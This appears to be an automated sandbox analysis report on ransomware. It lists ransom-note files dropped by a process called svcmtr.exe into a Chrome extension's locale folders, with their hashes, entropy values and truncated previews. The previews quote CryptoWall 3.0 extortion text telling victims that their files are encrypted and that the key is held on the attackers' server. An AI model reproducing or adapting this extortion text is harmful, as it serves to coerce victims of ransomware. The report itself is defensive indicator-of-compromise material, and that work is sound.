                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sk\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sk\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sv\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sv\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sw\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\sw\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ta\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ta\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\te\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\te\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\th\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
